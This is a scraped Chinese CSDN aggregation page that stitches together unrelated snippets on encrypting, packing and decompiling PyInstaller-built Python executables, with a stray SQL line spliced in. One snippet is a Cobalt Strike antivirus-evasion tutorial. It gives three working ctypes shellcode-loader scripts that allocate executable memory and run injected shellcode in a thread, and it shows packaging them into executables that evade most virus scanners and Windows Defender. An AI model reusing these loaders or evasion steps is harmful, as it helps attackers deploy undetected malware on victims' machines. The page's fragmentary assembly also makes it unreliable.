精华内容
下载资源
问答
  • Python代码加壳加密反编译 phthon加壳 pyinstaller生成的exe反编译 加壳 pyinstaller 版本高于3.0 命令行: pyinstaller -F -key=xxxxxx --clean xxx.py -F 生成一个单个的exe文件 -key 用于加密...

    Python代码加壳加密反编译

    • phthon加壳
    • pyinstaller生成的exe反编译

    加壳

    pyinstaller 版本高于3.0
    命令行:

    pyinstaller -F -key=xxxxxx --clean xxx.py

    -F 生成一个单个的exe文件
    -key 用于加密Python字节码的密钥 执行exe文件时直接读入内存

    反编译

    1.使用pyinstxtractor生成pyc文件(未加壳)
    http://download.csdn.net/download/zy841958835/10269926

    pyhton pyinstxtractor.py xx.exe

    在当前目录下会生成xx.exe_extracted文件夹里面的out00-PYZ.pyz_extracted文件夹里面就是反编译生成的pyc文件
    这里写图片描述

    2.使用Easy-Python-Decompiler解析生成的pyc文件
    http://download.csdn.net/download/zy841958835/10269930
    这里写图片描述

    SELECT * FROMCS.FL_ACT_VIEW AS OF TIMESTAMP TO_TIMESTAMP(‘2014-02-21 17:44:47’, ‘YYYY-MM-DD HH24:MI:SS’);

    展开全文
  • 移步至CSDN博客: https://blog.csdn.net/qq_44198436/article/details/97314626 转载于:https://www.cnblogs.com/liubingzhe/p/11314730.html

    移步至CSDN博客:

    https://blog.csdn.net/qq_44198436/article/details/97314626

    转载于:https://www.cnblogs.com/liubingzhe/p/11314730.html

    展开全文
  • python生成的EXE文件 进行反编译

    万次阅读 2020-04-19 16:14:20
    小问题,只要没有经过加壳操作,反编译一下吧我使用的python版本 Python 3.8.2第一步 准备需要的软件第二步 进行反编译以上方法反编译没有加壳python生产的exe文件 我使用的python版本 Python 3.8.2 第一步 准备...

    我使用的python版本 Python 3.8.2

    第一步 准备需要的软件

    下载Ming Loh的python反编译项目
    链接: https://github.com/countercept/python-exe-unpacker.
    下载编辑16进制的软件 wxmedit
    官网:http://wxmedit.github.io/zh_CN/downloads.html.
    蓝奏云
    链接: https://zzcwhair.lanzous.com/b015dcq1e
    密码:fjlc

    第二步 进行反编译

    查看反编译软件的目录
    在这里插入图片描述
    再这里面运行 cmd界面
    python pyinstxtractor.py xx.exe
    在这里插入图片描述
    这是运行成功界面
    在这里插入图片描述然后你会发现目录下多了个文件夹
    在这里插入图片描述
    进去文件夹后 找到你的软件名称 我这里是修改过了 之前的软件名称是pldc
    在这里插入图片描述
    好了 到了这里 就用开始下载的16进制的软件打开这两个文件 进行对比
    在这里插入图片描述
    在这里插入图片描述
    具体什么意思我也不是很懂 看了很多文章说 前面代表版本啥啥啥的 我就不解释了 按下面操作吧
    现在对比 struct 跟 pldc 可以看到 struct 比 pldc 多了一些东西 所以不要慌 给这两个文件复制一下 放到桌面做个备份 免得下面的操作 没实现 就麻烦了
    以下是我自己操作的过程图 选择查看
    在这里插入图片描述
    复制后 直接粘贴过去
    在这里插入图片描述
    但是你会发现粘贴的跟你复制的不一样 其实 叫你这样复制 不是为了直接复制过来 因为这个软件我也没搞懂换行跟别的 所以就复制过来了

    小问题不要慌 去struct 里面 按ctrl+C 复制一下 再粘贴过来
    在这里插入图片描述
    在这里插入图片描述
    上面 有几张图是我自己操作过程中 发现没办法换行去增加16进制 所以找的一个蠢方法

    最终的结果图
    在这里插入图片描述
    到了这一步 那么老铁 直接保存 然后更改pldc的后缀为 pldc.pyc
    在这里插入图片描述
    然后再终端pip install uncompyle安装uncompyle,
    uncompyle6 pldc.pyc
    在这里插入图片描述
    uncompyle6 pldc.pyc > pldc.py
    在这里插入图片描述

    废话有点多 将就着看
    python版本是
    Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)] on win32
    Type “help”, “copyright”, “credits” or “license” for more information.

    别的版本不知道能不能成

    以上方法反编译没有加壳的python生产的exe文件

    展开全文
  • 主要使用pyinstxtractor.py的pyinstxtractor.py将exe还原为.pyc,然后还有生成的stract文件中获取前8个字节(magic)补充到目标文件,这里我用python解决了。然后使用uncompyle做的将.pyc转到.py 使用 pip install ...
  • CS作为主流红队工具,其在后渗透中的地位自不用说,功能强大,但如何让它活下去就成了个人发挥的内容,今天我们以python payload为例展开。payload生成通过cs自动生成我们python payload:值得一提的是360、电脑管家...

    CS作为主流红队工具,其在后渗透中的地位自不用说,功能强大,但如何让它活下去就成了个人发挥的内容,今天我们以python payload为例展开。

    payload生成

    92746f59736c

    通过cs自动生成我们python payload:

    92746f59736c

    值得一提的是360、电脑管家等均为对该payload报毒,倒是Windows Defender觉得事情没那么简单,显然不装杀毒软件的PC是最难搞的23333,因为它会默认开启Windows Defender。

    92746f59736c

    payload执行

    从公开的几例code来讨论一下,其实大同小异,都调用了ctypes第三方库,如下demo仅支持python2:

    import ctypes

    payload = ""

    shellcode = bytearray(payload)

    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),

    ctypes.c_int(len(shellcode)),

    ctypes.c_int(0x3000),

    ctypes.c_int(0x40))

    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),

    buf,

    ctypes.c_int(len(shellcode)))

    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),

    ctypes.c_int(0),

    ctypes.c_int(ptr),

    ctypes.c_int(0),

    ctypes.c_int(0),

    ctypes.pointer(ctypes.c_int(0)))

    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))

    接下来两例兼容python2/3:

    import ctypes

    shellcode = ""

    rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)

    ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))

    handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)

    ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

    import ctypes

    buf = ""

    #libc = CDLL('libc.so.6')

    PROT_READ = 1

    PROT_WRITE = 2

    PROT_EXEC = 4

    def executable_code(buffer):

    buf = c_char_p(buffer)

    size = len(buffer)

    addr = libc.valloc(size)

    addr = c_void_p(addr)

    if 0 == addr:

    raise Exception("Failed to allocate memory")

    memmove(addr, buf, size)

    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):

    raise Exception("Failed to set protection on buffer")

    return addr

    VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc

    VirtualProtect = ctypes.windll.kernel32.VirtualProtect

    shellcode = bytearray(buf)

    whnd = ctypes.windll.kernel32.GetConsoleWindow()

    if whnd != 0:

    if 1:

    ctypes.windll.user32.ShowWindow(whnd, 0)

    ctypes.windll.kernel32.CloseHandle(whnd)

    memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),

    ctypes.c_int(len(shellcode)),

    ctypes.c_int(0x3000),

    ctypes.c_int(0x40))

    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

    old = ctypes.c_long(1)

    VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))

    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),

    buf,

    ctypes.c_int(len(shellcode)))

    shell = cast(memorywithshell, CFUNCTYPE(c_void_p))

    shell()

    payload封装

    当然了,我们可无法保证所有的目标机都装有python环境,所以我们借助打包工具来进行打包,但缺点显而易见,生成的木马文件体积较大,但作为入门免杀我们暂且接受这一点。

    常见Python打包工具有三种py2exe、PyInstaller和cx_Freeze等。笔者此处以PyInstaller为例。

    然而值得吐槽的有两点:

    1、pyinstaller对py3环境的打包极不友好,bug层出,需要参考官方issue手动下载而非pip自动安装,但即使如此依然存在bug,所以最终笔者选择了打包py2环境。

    2、pyinstaller打包的可执行程序在win7/server2008R2均测试良好,但win10/server2016均无响应或报错,所以在实际使用前请在与目标机尽可能相同的环境中预调试。

    #安装

    pip install pyinstaller

    #打包

    pyinstaller -F -w -i rabbit.ico payload.py

    参数说明:

    -F,-onefile 产生单个的可执行文件

    -w,--windowed,--noconsolc 指定程序运行时不显示命令行窗口(仅对 Windows 有效)

    -i, 指定图标

    根据上述三种code方案生成了三个mua文件,大小4M内,勉强接受。

    92746f59736c

    win7/2008R2测试上线,全部通过:

    92746f59736c

    最后,是我们关注的免杀问题:

    在virscan提供的49款AV中,仅6款报毒。

    92746f59736c

    92746f59736c

    Windows Defender亦不会报毒:

    92746f59736c

    免责声明

    本文内容仅适用于红队,请勿用于任何未授权测试。

    展开全文
  • 记一次对pyinstaller打包的,无加壳exe程序的反编译。之前,有位朋友写了有关学校充电费的程序,打包成了exe,现在学校充电费的网站更新了,我就想把这位朋友写的程序反编译一下,然后进行代码修改。 首先: 将朋友...
  • python打包中的坎坷具体请查阅我的博客《python代码打包成exe (成功心得)》
  • python 加密-对exe加密

    千次阅读 2019-04-03 11:58:01
    Python 是一种面向对象的解释型计算机程序设计语言,Python 语言写的程序不需要编译成二进制代码,可以直接从源代码运行程序。 在计算机内部,Python解释器把源代码转换成称为字节的中间形式,然后再它翻译计算机...
  • 很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎...0x01 环境准备1、软件安装2、msfvenom生成Python P...
  • 操作非常简单,几个命令就搞定了,这个比py2exe容易用多了 缺点: 打包后的体积过大,因为要带python.dll库,所以没有办法 不能和tkinter 等库,打包成单独一个文件 安装方法: 1. 去官方网站...
  • 原理是:1:先混淆一次代码 可以把源码很好的加密 2:用pyinstaller加上加密参数打包 3:用写好的加密处理程序对这个exe进行加密操作,然后配好解密这个加密处理程序的登录器,内置授权体系,可以绑定用户的支付宝 ...
  • pyinstaller-python->exe

    2018-07-17 18:33:00
    pip install pyinstaller。 pyinstaller -F /home/base64_decode.py https://www.imooc.com/article/26772 https://blog.csdn.net/lcb_coconut/article/details/79228759 转载于:https://www.cnblogs....
  • 2. 操作非常简单,几个命令就搞定了,这个比py2exe容易用多了   缺点:   1. 打包后的体积过大,因为要带python.dll库,所以没有办法   2. 不能和tkinter 等库,打包成单独一个文件   使用方法:   1...
  • Python 是一种面向对象的解释型计算机程序设计语言,Python 语言写的程序不需要编译成二进制代码,可以直接从源代码运行程序。 在计算机内部,Python解释器把源代码转换成称为字节的中间形式,然后再它翻译计算机...
  • 用cmd进入PyInstaller的目录 然后执行以下命令: python pyinstaller.py -F C:\test.py 以上命令需要把Python目录加入环境变量 -F 的意思是生成一个单独的exe文件 如果不加就会生成一个目录 3. PyInstaller使用了...
  • Python 是一种面向对象的解释型计算机程序设计语言,Python 语言写的程序不需要编译成二进制代码,可以直接从源代码运行程序。 在计算机内部,Python解释器把源代码转换成称为字节的中间形式,然后再它翻译计算机...
  • 操作非常简单,几个命令就搞定了,这个比py2exe容易用多了缺点:1. 打包后的体积过大,因为要带python.dll库,所以没有办法2. 不能和tkinter 等库,打包成单独一个文件 1、下载pyinstaller 目前pyinstaller支持的...
  • 关于python的加密目前软件开发商对 Python 加密时可能会有...1、 对 pythonexe加壳下载最新版加壳工具,使用加壳工具直接对demo.exe进行加壳操作2、对.py/.pyc加密第一步,使用加壳工具对 python 安装目录下的 py...
  • 保护背景Python语言写的程序无需编译成二进制文件代码,可以直接从源代码运行程序。在计算机内部, Python解释器把源代码转换成字节码的中间形式,然后再把它翻译成计算机使用的机器语言并运行,这使得 Python程序更加...
  • 主要介绍了Python实现封装打包自己写的代码,被python import,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
  • 7.2.3 使用py2exe编译Python代码 第8章 Fuzzing 8.1 几种常见的bug类型 8.1.1 缓冲区溢出 8.1.2 整数溢出 8.1.3 格式化串攻击 8.2 文件Fuzzer 8.3 后续改进策略 8.3.1 代码覆盖率 8.3.2 自动化静态分析 第9章 Sulley...
  • 我多想再见你哪怕匆匆一眼就别离python作为一种解释型语言,源代码加密本身比较困难。但有时候我们在发布一款python产品时又必须考虑到代码的加密性,以避免源代码泄露。为此,我查阅了一些资料,研究了几种python...
  • upx加壳原理

    万次阅读 2012-04-01 13:30:02
    一种叫做给程序加壳,另一种叫压缩程序。其实这两种表述都是正确的,只是从不同的 角度 对upx的描述。 upx的工作原理其实是这样的:首先将程序压缩。所谓的压缩包括两方面,一方面在程序的开头或者其他合适的 地方 ...
  • UPX是开源的加壳和压缩exe的程序,使用UPX能有效减小发布的exe文件体积。 安装PyInstaller: 如果你对python感兴趣,我这有个学习Python基地,里面有很多学习资料,感兴趣的+Q群:688244617 p...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 539
精华内容 215
关键字:

exe加壳python

python 订阅